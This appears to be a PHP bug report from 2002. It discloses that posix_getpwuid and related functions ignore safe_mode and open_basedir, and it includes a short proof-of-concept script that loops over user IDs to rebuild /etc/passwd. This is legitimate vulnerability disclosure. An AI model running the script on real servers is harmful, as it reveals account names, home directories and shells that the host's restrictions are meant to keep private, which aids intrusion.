From: [EMAIL PROTECTED] Operating system: Unix PHP version: 4.2.0 PHP Bug Type: *General Issues Bug description: posix_getpw* bypasses safe_mode and open_basedir
I noticed that many of the posix_* functions DO NOT check wether safe_mode or open_basedir restrict access to the user database thus allowing a user to rebuild a complete /etc/passwd without permissions to read /etc/passwd or access the /etc directory. This is dangerous in some cases where login are kept secret as it allows a user to know what accounts have what privileges and what accounts have access to a shell or not. For now there is only one thing to do, disable these functions but i'm pretty sure that adding checks to see values of safe_mode and/or open_basedir would be a nice thing to do. Here's a script that rebuilds /etc/passwd when safe_mode is enabled and open_basedir is set to the user homedirectory: <? for ($i = 0; $i < 60000; $i++) { if (($tab = @posix_getpwuid($i)) != NULL) { echo $tab['name'].":"; echo $tab['passwd'].":"; echo $tab['uid'].":"; echo $tab['gid'].":"; echo $tab['gecos'].":"; echo $tab['dir'].":"; echo $tab['shell']."<br>"; } } ?> On a very large system, if an execution time is set, this will not end up, but hopefully the posix_getpwent() function is missing so the user has to go through all possible uid's. -- Edit bug report at http://bugs.php.net/?id=16733&edit=1 -- Fixed in CVS: http://bugs.php.net/fix.php?id=16733&r=fixedcvs Fixed in release: http://bugs.php.net/fix.php?id=16733&r=alreadyfixed Need backtrace: http://bugs.php.net/fix.php?id=16733&r=needtrace Try newer version: http://bugs.php.net/fix.php?id=16733&r=oldversion Not developer issue: http://bugs.php.net/fix.php?id=16733&r=support Expected behavior: http://bugs.php.net/fix.php?id=16733&r=notwrong Not enough info: http://bugs.php.net/fix.php?id=16733&r=notenoughinfo Submitted twice: http://bugs.php.net/fix.php?id=16733&r=submittedtwice